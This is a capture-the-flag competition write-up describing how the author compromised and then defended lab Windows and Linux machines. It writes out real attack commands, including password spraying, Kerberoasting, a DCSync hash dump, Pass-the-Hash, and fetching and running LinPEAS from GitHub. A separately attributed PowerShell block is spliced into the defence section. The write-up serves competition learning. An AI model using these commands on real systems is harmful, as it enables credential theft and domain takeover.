1. Overview of the Competition

This KOTH competition was a purple team event set up by the amazing Cal Poly Swift. Competitors would log in remotely to a Kali machine to attack 6 machines, gain root, plant their flag, and defend their flags and services from other hackers trying to plant theirs.

Because we had no direct access to the environment, we had to use SSH tunneling to reach things like the websites, set up BloodHound, and more.


This was the competition environment; each machine had one scored service, either WinRM (port 5985/5986) or SSH (port 22), for 6 scored services in total.

In order to get scored, you had to keep your services running and secured while maintaining your flag in one of the specified file locations:

  • Linux: /root/flag.txt
  • Windows: \Users\Administrator\Desktop\flag.txt

Also, for the sake of fun, you couldn’t change the root/Administrator password!

There were also trivia questions that would give us points if we answered them correctly and fast enough.


At the start, I went ahead and tried to gain access to a Linux machine. However, after the first hour, I switched to Windows, so I will go over my attack path for Windows first.


Attacking Windows

To start off with Windows, I performed an Nmap scan to see what ports were open.

nmap -sC -sV -T5 10.109.124.214


From the scan output, I could see that LDAP and Kerberos were open, as well as the domain name, which we needed for our first trivia question.

At this point, I was stuck because I thought I needed credentials to get any useful information out of the services. That was until Trivia Question 2!


This question allowed me to finally start chipping away at Windows.

First, I ran this command to find all SMB shares on the machine:

smbclient -L 10.109.124.232


After getting a look at the shares, I instantly suspected that Data was the share with plaintext credentials, so I used the following command to connect to it anonymously (-N). Once connected, I listed the share, found the file, and downloaded it to my home directory with these two commands:

smbclient //10.109.124.232/Data -N
ls
get creds.txt


Opening the retrieved file gave me a set of credentials.


With these credentials, I was able to set up a password spray attack to see what accounts worked.

nxc smb 10.109.124.214 10.109.124.241 10.109.124.232 -u users.txt -p passwords.txt


After I found a valid login, I used it to perform a Kerberoast attack on the Domain Controller (since Kerberos was open).

impacket-GetUserSPNs -request -dc-ip 10.109.124.214 kingofthehill.local/ghostadmin:Resurrect1 > output.txt


Now that I had the Kerberos hashes, it was time to crack them with Hashcat.

hashcat -a 0 output.txt /usr/share/wordlists/rockyou.txt.gz


With my new credentials, I went ahead and ran nxc again to see what I could do with them.

nxc smb 10.109.124.214 10.109.124.241 10.109.124.232 -u peggy -p password2


This was good news. The (Pwn3d!) marker means the account has local administrator rights on that host, and in this case my new account, peggy, turned out to be a Domain Admin.

With these credentials, I performed a DCSync attack on the Domain Controller so I could get a dump of all NTLM hashes.

impacket-secretsdump kingofthehill.local/peggy:password2@10.109.124.214 -just-dc


NTLM hashes are special: instead of cracking the Administrator hash with Hashcat, you can authenticate with the hash itself, a technique called Pass-the-Hash. I did that with evil-winrm.

evil-winrm -i 10.109.124.214 -u Administrator -H 5c5aefbcab1053c010bc9c1cfcc6f95d



Defending Windows

Once I gained admin access, I had to plant my flag and secure the machine so other hackers couldn’t steal it. At first, I used a simple echo command and redirected its output into the flag file. Eventually, an attacker stole my box, so I wrote a looping PowerShell script that would check if the file was there, put it back if it was missing or changed, and mark it Read-Only and Hidden.

echo "FLAG-S3X7Q5K8M2T9R4BL" > C:\Users\Administrator\Desktop\flag.txt
# ------------------------------------
$flag = "FLAG-S3X7Q5K8M2T9R4BL"
$path = "C:\Users\Administrator\Desktop\flag.txt"

while($true) {
    # Check if the file content has changed (a missing file returns $null, which also counts as changed)
    $current = Get-Content $path -ErrorAction SilentlyContinue
    if ($current -ne $flag) {
        # If changed/deleted, write it back immediately
        # (plain > cannot overwrite the file once it is Read-only/Hidden; this is the flaw I mention further down)
        echo $flag > $path
        # Lock it (Read-only + Hidden)
        attrib +r +h $path
        Write-Host "Flag restored!"
    }
    Start-Sleep -Seconds 2
}


Somehow the attacker was still able to steal my flag, and I had to figure out a way to get it back. One thing I knew was that we couldn’t delete files, so the only option was to overwrite it. My script was partially flawed, but as a quick fix I simply stripped the attributes by hand and ran the script again.

attrib -r -h -s C:\Users\Administrator\Desktop\flag.txt
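As an added example (not the write-up's own script), here is one way to close the gap that the quick fix above works around: PowerShell's redirection operator cannot overwrite a file once it carries the ReadOnly and Hidden attributes, so the loop below drops the attributes, rewrites the flag, and re-applies them every time the content differs from what it should be. The flag value and path are the ones from the write-up; the function names are my own.

```powershell
# Added example, not the original competition script.
$flag = "FLAG-S3X7Q5K8M2T9R4BL"                        # value from the write-up
$path = "C:\Users\Administrator\Desktop\flag.txt"      # scored flag location

function Get-FlagContent {
    # Read the file through .NET so Hidden/ReadOnly attributes do not matter; $null if it is gone.
    if (-not [System.IO.File]::Exists($path)) { return $null }
    return ([System.IO.File]::ReadAllText($path)).Trim()
}

function Restore-Flag {
    # -Force is required for Get-Item to return a hidden file at all.
    $item = Get-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue
    if ($item) {
        # Clear ReadOnly/Hidden first; otherwise the write below fails with "access denied".
        $item.Attributes = [System.IO.FileAttributes]::Normal
    }
    [System.IO.File]::WriteAllText($path, $flag)
    # Re-apply the protective attributes (equivalent of attrib +r +h).
    (Get-Item -LiteralPath $path -Force).Attributes =
        [System.IO.FileAttributes]::ReadOnly -bor [System.IO.FileAttributes]::Hidden
}

while ($true) {
    if ((Get-FlagContent) -ne $flag) {
        Restore-Flag
        Write-Host "$(Get-Date -Format o) flag restored"
    }
    Start-Sleep -Seconds 2
}
```

Run it from an elevated PowerShell session that stays open (or as a background job) so the loop keeps polling; the restore works even after another operator has stripped, hidden, or rewritten the file, because the attributes are reset on every pass rather than only the first.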


After that, I changed the passwords of the Domain Admin accounts that I used to get the NTLM hash. Since I couldn’t change the Administrator password, I had to remediate my path to admin so no one else could use it.

net user peggy SUPER_L0NG_PASS123!
# Checking if the hash dump still works (it shouldn't):
impacket-secretsdump kingofthehill.local/peggy:password2@10.109.124.214


Finally, when that was over, I went ahead and did the same on the remaining Windows machines.



Attacking Linux

After I claimed all of the Windows boxes, I thought about using some of the credentials that I gained from the Windows machines, and luckily, I got a hit! But soon after I logged in, I got kicked off by the person defending the machine.


At that point, I decided to log back in and try to get LinPEAS (a Linux privilege escalation tool) running.

wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

While it was running, I found that the sudoers file was misconfigured, so I could run commands through sudo without being prompted for a password.


This was because of a rule of the form (ALL : ALL) NOPASSWD: ALL, which lets the users it applies to run any command as any user without entering a password. With that, I ran sudo bash to become root.



Defending Linux

When I gained admin access, I planted my flag using:

echo "flag" > /root/flag.txt

I then made it immutable with:

chattr +i /root/flag.txt

However, I forgot to kick the current user out of the session and then got locked out myself.


Before I got locked out, I used the w or who command to see who was logged into the machine. I saw bobby (the user I used to gain root) and pr0pane3. The plan from then on was to get access to another machine and remove the current user from the system.


I was able to use the bobby user to log into hankcore via SSH. Once in, I escalated privileges to root with sudo bash, just as I had on the previous machine.

Upon checking the active users with the who command, I spotted a rival hacker named gary who was actively logged in on multiple terminals (pts/1 and pts/2).


I immediately attempted to remove his account using userdel gary, but the command failed because he had active processes running. To fix this, I went into “Incident Response” mode and used pkill -9 to forcefully terminate his specific TTY sessions and process IDs. Once his connections were severed, I was free to delete his account and secure the box.


Conclusion

In the end, these were the machines that I had under my control.


This was the most that I had at one time.


Overall, I ended in 2nd place and had a great time competing in such a unique and fun competition.

